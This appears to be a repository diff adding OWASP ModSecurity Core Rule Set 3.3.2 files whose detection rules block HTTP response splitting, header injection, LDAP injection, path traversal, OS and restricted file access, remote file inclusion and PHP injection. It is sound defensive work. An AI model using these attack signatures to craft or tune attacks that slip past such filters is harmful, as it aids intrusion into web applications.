tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/33',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ HTTP Response Splitting ]=-
#
# [ Rule Logic ]
# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters.
# These characters may cause problems if the data is returned in a respones header and
# may be interpreted by an intermediary proxy server and treated as two separate
# responses.
#
# [ References ]
# http://projects.webappsec.org/HTTP-Response-Splitting
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx [\r\n]\W*?(?:content-(?:type|length)|set-cookie|location):\s*\w" \
"id:921120,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:lowercase,\
msg:'HTTP Response Splitting Attack',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/34',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:\bhttp/\d|<(?:html|meta)\b)" \
"id:921130,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
msg:'HTTP Response Splitting Attack',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/34',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ HTTP Header Injection ]=-
#
# [ Rule Logic ]
# These rules look for Carriage Return (CR) %0d and Linefeed (LF) %0a characters,
# on their own or in combination with header field names.
# These characters may cause problems if the data is returned in a response header
# and interpreted by the client.
# The rules are similar to rules defending against the HTTP Request Splitting and
# Request Smuggling rules.
#
# [ References ]
# https://en.wikipedia.org/wiki/HTTP_header_injection
#
SecRule REQUEST_HEADERS_NAMES|REQUEST_HEADERS "@rx [\n\r]" \
"id:921140,\
phase:2,\
block,\
capture,\
t:none,t:htmlEntityDecode,\
msg:'HTTP Header Injection Attack via headers',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/273',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# Detect newlines in argument names.
# Checking for GET arguments has been moved to paranoia level 2 (921151)
# in order to mitigate possible false positives.
#
# This rule is also triggered by the following exploit(s):
# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ]
#
SecRule ARGS_NAMES "@rx [\n\r]" \
"id:921150,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,\
msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/33',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule ARGS_GET_NAMES|ARGS_GET "@rx [\n\r]+(?:\s|location|refresh|(?:set-)?cookie|(?:x-)?(?:forwarded-(?:for|host|server)|host|via|remote-ip|remote-addr|originating-IP))\s*:" \
"id:921160,\
phase:1,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,\
msg:'HTTP Header Injection Attack via payload (CR/LF and header-name detected)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/33',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# -=[ HTTP Splitting ]=-
#
# This rule detect \n or \r in the REQUEST FILENAME
# Reference: https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
SecRule REQUEST_FILENAME "@rx [\n\r]" \
"id:921190,\
phase:1,\
block,\
t:none,t:urlDecodeUni,\
msg:'HTTP Splitting (CR/LF in request filename detected)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/34',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ LDAP Injection ]=-
#
# [ Rule Logic ]
#
# This is a rule trying to prevent LDAP injection. It is based on a BlackHat presentation by Alonso Parada
# and regex writing by Denis Kolegov.
#
# [ References ]
# * https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
# * https://blog.ripstech.com/2017/joomla-takeover-in-20-seconds-with-ldap-injection-cve-2017-14596/
# * https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/276#issue-126581660
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\(\)\&\|\!\<\>\~]*\)\s*(?:\((?:[^,\(\)\=\&\|\!\<\>\~]+[><~]?=|\s*[&!|]\s*(?:\)|\()?\s*)|\)\s*\(\s*[\&\|\!]\s*|[&!|]\s*\([^\(\)\=\&\|\!\<\>\~]+[><~]?=[^:\(\)\&\|\!\<\>\~]*)" \
"id:921200,\
phase:2,\
block,\
capture,\
t:none,t:htmlEntityDecode,\
msg:'LDAP Injection Attack',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-ldap',\
tag:'platform-multi',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/248/136',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
# Detect newlines in GET argument values.
# These may point to a HTTP header injection attack, but can also sometimes
# occur in benign query parameters.
#
# See also: rule 921140, 921150
#
SecRule ARGS_GET "@rx [\n\r]" \
"id:921151,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:htmlEntityDecode,\
msg:'HTTP Header Injection Attack via payload (CR/LF detected)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/2',\
tag:'OWASP_CRS',\
tag:'capec/1000/210/272/220/33',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
#
# -=[ HTTP Parameter Pollution ]=-
#
# [ Rule Logic ]
# These rules look for multiple parameters with the same name.
# 921170 counts the occurrences of the individual parameters.
# 921180 checks if any counter is > 1.
#
# One HPP attack vector is to try evade signature filters by distributing the
# attack payload across multiple parameters with the same name.
# This works as many security devices only apply signatures to individual
# parameter payloads, however the back-end web application may (in the case
# of ASP.NET) consolidate all of the payloads into one thus making the
# attack payload active.
#
# [ References ]
# http://tacticalwebappsec.blogspot.com/2009/05/http-parameter-pollution.html
# https://capec.mitre.org/data/definitions/460.html
#
SecRule ARGS_NAMES "@rx ." \
"id:921170,\
phase:2,\
pass,\
nolog,\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'paranoia-level/3',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/137/15/460',\
ver:'OWASP_CRS/3.3.2',\
setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
SecRule TX:/paramcounter_.*/ "@gt 1" \
"id:921180,\
phase:2,\
pass,\
msg:'HTTP Parameter Pollution (%{TX.1})',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-protocol',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/137/15/460',\
tag:'paranoia-level/3',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
chain"
SecRule MATCHED_VARS_NAMES "@rx TX:paramcounter_(.*)" \
"capture,\
setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,skipAfter:END-REQUEST-921-PROTOCOL-ATTACK"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-921-PROTOCOL-ATTACK"

155
core/modsecurity/files/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf Normal file
View File

@@ -0,0 +1,155 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ Directory Traversal Attacks ]=-
#
# Ref: https://github.com/wireghoul/dotdotpwn
#
# [ Encoded /../ Payloads ]
#
SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?i)(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8|e)0%80%ae|2(?:(?:5(?:c0%25a|2))?e|%45)|u(?:(?:002|ff0)e|2024)|%32(?:%(?:%6|4)5|E)|c0(?:%[256aef]e|\.))|\.(?:%0[01]|\?)?|\?\.?|0x2e){2}(?:\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\/))" \
"id:930100,\
phase:2,\
block,\
capture,\
t:none,\
msg:'Path Traversal Attack (/../)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-lfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/255/153/126',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
#
# [ Decoded /../ Payloads ]
#
SecRule REQUEST_URI|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|XML:/* "@rx (?:^|[\\/])\.\.(?:[\\/]|$)" \
"id:930110,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:removeNulls,t:cmdLine,\
msg:'Path Traversal Attack (/../)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-lfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/255/153/126',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
multiMatch,\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}',\
setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'"
#
# -=[ OS File Access ]=-
#
# Ref: https://github.com/lightos/Panoptic/blob/master/cases.xml
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFile lfi-os-files.data" \
"id:930120,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
msg:'OS File Access Attempt',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-lfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/255/153/126',\
tag:'PCI/6.5.4',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# -=[ Restricted File Access ]=-
#
# Detects attempts to retrieve application source code, metadata,
# credentials and version control history possibly reachable in a web root.
#
SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \
"id:930130,\
phase:2,\
block,\
capture,\
t:none,t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase,\
msg:'Restricted File Access Attempt',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-lfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/255/153/126',\
tag:'PCI/6.5.4',\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-930-APPLICATION-ATTACK-LFI"

152
core/modsecurity/files/coreruleset/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf Normal file
View File

@@ -0,0 +1,152 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# RFI Attacks
#
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
# -=[ Rule Logic ]=-
# These rules look for common types of Remote File Inclusion (RFI) attack methods.
# - URL Contains an IP Address
# - The PHP "include()" Function
# - RFI Data Ends with Question Mark(s) (?)
# - RFI Host Doesn't Match Local Host
#
# -=[ References ]=-
# http://projects.webappsec.org/Remote-File-Inclusion
# http://tacticalwebappsec.blogspot.com/2009/06/generic-remote-file-inclusion-attack.html
#
SecRule ARGS "@rx ^(?i:file|ftps?|https?):\/\/(?:\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})" \
"id:931100,\
phase:2,\
block,\
capture,\
t:none,\
msg:'Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-rfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/175/253',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_absolute_path|_CONF\[path\]|_SERVER\[DOCUMENT_ROOT\]|GALLERY_BASEDIR|path\[docroot\]|appserv_root|config\[root_dir\])=(?:file|ftps?|https?):\/\/" \
"id:931110,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,\
msg:'Possible Remote File Inclusion (RFI) Attack: Common RFI Vulnerable Parameter Name used w/URL Payload',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-rfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/175/253',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \
"id:931120,\
phase:2,\
block,\
capture,\
t:none,\
msg:'Possible Remote File Inclusion (RFI) Attack: URL Payload Used w/Trailing Question Mark Character (?)',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-rfi',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/175/253',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher)
#
SecRule ARGS "@rx ^(?i:file|ftps?|https?)://([^/]*).*$" \
"id:931130,\
phase:2,\
block,\
capture,\
t:none,\
msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-multi',\
tag:'platform-multi',\
tag:'attack-rfi',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/175/253',\
tag:'paranoia-level/2',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\
chain"
SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \
"setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI"
#
# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher)
#
#
# -= Paranoia Levels Finished =-
#
SecMarker "END-REQUEST-931-APPLICATION-ATTACK-RFI"

729
core/modsecurity/files/coreruleset/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf Normal file
View File

File diff suppressed because one or more lines are too long

733
core/modsecurity/files/coreruleset/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf Normal file
View File

@@ -0,0 +1,733 @@
# ------------------------------------------------------------------------
# OWASP ModSecurity Core Rule Set ver.3.3.2
# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
#
# The OWASP ModSecurity Core Rule Set is distributed under
# Apache Software License (ASL) version 2
# Please see the enclosed LICENSE file for full details.
# ------------------------------------------------------------------------
#
# -= Paranoia Level 0 (empty) =- (apply unconditionally)
#
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933011,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:933012,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP"
#
# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
#
#
# -=[ PHP Injection Attacks ]=-
#
# [ References ]
# http://rips-scanner.sourceforge.net/
# https://www.owasp.org/index.php/PHP_Top_5#P1:_Remote_Code_Executionh
#
#
# [ PHP Open Tag Found ]
#
# Detects PHP open tags "<?" and "<?php".
# http://www.php.net/manual/en/language.basic-syntax.phptags.php
#
# Care is taken to avoid false positives in XML declarations "<?xml..."
#
# Also detects "[php]", "[/php]" and "[\php]" tags used by some applications
# to indicate PHP dynamic content.
#
# Previously, this rule also checked for the PHP close tag '?>', but
# this resulted in false positives which were difficult to prevent.
# Therefore, that pattern is now checked by rule 933190 in paranoia levels
# 3 or higher.
#
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:<\?(?:[^x]|x[^m]|xm[^l]|xml[^\s]|xml$|$)|<\?php|\[(?:\/|\\\\)?php\])" \
"id:933100,\
phase:2,\
block,\
capture,\
t:none,t:urlDecodeUni,t:lowercase,\
msg:'PHP Injection Attack: PHP Open Tag Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
#
# [ PHP Script Uploads ]
#
# Block file uploads with filenames ending in PHP related extensions
# (.php, .phps, .phtml, .php5 etc).
#
# Many application contain Unrestricted File Upload vulnerabilities.
# https://www.owasp.org/index.php/Unrestricted_File_Upload
#
# Attackers may use such a vulnerability to achieve remote code execution
# by uploading a .php file. If the upload storage location is predictable
# and not adequately protected, the attacker may then request the uploaded
# .php file and have the code within it executed on the server.
#
# Also block files with just dot (.) characters after the extension:
# https://community.rapid7.com/community/metasploit/blog/2013/08/15/time-to-patch-joomla
#
# Some AJAX uploaders use the nonstandard request headers X-Filename,
# X_Filename, or X-File-Name to transmit the file name to the server;
# scan these request headers as well as multipart/form-data file names.
#
SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\.*$" \
"id:933110,\
phase:2,\
block,\
capture,\
t:none,t:lowercase,\
msg:'PHP Injection Attack: PHP Script File Upload Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
tag:'language-php',\
tag:'platform-multi',\
tag:'attack-injection-php',\
tag:'paranoia-level/1',\
tag:'OWASP_CRS',\
tag:'capec/1000/152/242',\
ctl:auditLogParts=+E,\
ver:'OWASP_CRS/3.3.2',\
severity:'CRITICAL',\
setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\
